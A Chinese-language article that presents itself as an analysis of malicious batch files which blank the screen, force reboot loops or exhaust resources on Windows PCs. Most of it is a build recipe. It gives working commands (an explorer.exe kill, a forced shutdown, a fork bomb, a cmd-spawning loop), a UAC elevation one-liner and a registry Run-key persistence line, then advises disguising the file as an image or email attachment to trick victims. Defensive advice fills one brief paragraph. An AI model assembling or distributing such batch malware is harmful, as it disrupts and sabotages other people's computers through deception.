惡意批處理文件導致電腦黑屏、反復重啟、無響應的原因分析及應對思路

欒春偉

電腦"黑屏"、“反復重啟”、”死機無響應”，成因多種多樣，處理方法也各不相同。很多時候，是惡意計算機程序導致，這里做個分析，提供一種解決思路。

一、有三條計算機命令，常被初級黑客用來制造小麻煩

1、電腦屏幕變全黑

taskkill -f -im explorer.exe

作用，關閉windows的圖形桌面。

2、在指定時間后，重新啟動電腦

shutdown -r -f -t 10

作用，在10秒鐘后，重新啟動windows電腦，強制執行。把這個命令放入“開機啟動”中，可以實現開機后，反復重啟計算機的效果。推而廣之，也可以預定在某個約時間，執行一系列的命令，不僅僅是重啟電腦，也可以備份重要數據到遠程等等。

3、把計算機資源耗盡，導致死機無響應

建立一個批處理文件中，輸入命令為

%0|%0

作用：批處理文件反復調用自己，每調用一次，占用一定資源，直到把計算機資源耗盡。

此外，常見的方法還有：建立一個批處理文件中，輸入命令為

：callCmdWindow

start cmd.exe

goto callCmdWindow

其作用是利用批處理文件，不斷彈出CMD命令窗口，直到將計算機資源耗盡。與%0|%0的思路相通，方法不同而已。

二、命令代碼如何被計算機自動執行

1、利用windows自啟動項

windows注冊表Run鍵，是最易容想到的程序自啟動位置，讓電腦進入widonws后，自動加載惡意代碼，只要把包含惡意代碼的文件，加入到Run即可。Run鍵有2個位置，分別是：

[HKEY_CURRENT_USER＼Software＼Microsoft＼Windows＼CurrentVersion＼Run]

[HKEY_LOCAL_MACHINE＼Software＼Microsoft＼Windows＼CurrentVersion＼Run]

2、把批處理文件放到自啟動項里

寫一個批處理文件。這個批處理文件的功能，不僅包括要執行的“搗亂代碼”，還要包括，取得必要的程序執行權限，修改注冊表，以及把自己加載到計算機的開機自動執行程序名單里面等功能。

（1）新建一個批處理文件，

用windows自帶的記事本，新建一個批處理文件，例如，文件名是：我的批處理文件.cmd，windows中批處理文件后綴是 .bat或.cmd，后綴與具體windows 版本有關。

（2）獲取windows系統管理員權限

想要修改注冊表，比如RUN值等，都需要先拿到計算機的系統管理員權限，才能實施。在批處理文件中加入下列命令，取得管理員權限。

%1 mshta vbscript：CreateObject（"Shell.Application"）.ShellExecute（"cmd.exe"，"/c %～s0："，""，"runas"，1）（window.close）&&exit

（3）批處理文件將自身加入到windows自啟動項

在取得管理員權限后，在批處理文件中，寫入下列代碼，完成在注冊表中，把批處理文件自身加入到開機啟動的清單里面。這樣，以后，每次電腦開機，都后執行這個批處理文件，也就是這個文件中的惡意代碼。

reg add "HKEY_LOCAL_MACHINE＼Software＼Microsoft＼Windows＼CurrentVersion＼run" /v 我的批處理文件 /d "%～dp0我的批處理文件.cmd" /f

（4）惡意代碼

選本文第一部分介紹的3個方法之一，放 與（略）

三、如何讓電腦用戶點擊這個批處理文件

完成上面的工作，一個簡單的黑客程序就寫好了。如何讓別人來執行這個黑客程序呢。這就要用到社會工程學了，說白了，就是如何去忽悠人，想辦法讓人點擊這個批處理文件，一點擊，就可以在受害人的電腦上執行了。常見的就是，把這個文件偽裝成吸睛美圖、掃二維碼中獎、老板郵件的附件等等。

四、如何防范

此種惡意代碼很易容在內網中制造麻煩，因為這種惡意程序是自己編制的，用的也是正常的命令，沒有進入計算機防病毒軟件的病毒庫，反毒軟件也很發現和防范這種代碼。因此，了解一些計算機安全基本常識必要，不點擊來源不明的文件和鏈接，了解并查看自己計算機的啟動項內容，會清理不必要的啟動項，可以有效防范類似惡意代碼。

五、結束語

本文通過實例，簡明地介紹了計算機惡意程序制作及傳播的基本方法，有利于提高電腦用戶的網絡信息安全意識，提高防范黑客攻擊和計算機病毒入侵的能力，對網絡管理人員解決運行中的問題，也有一定的幫助。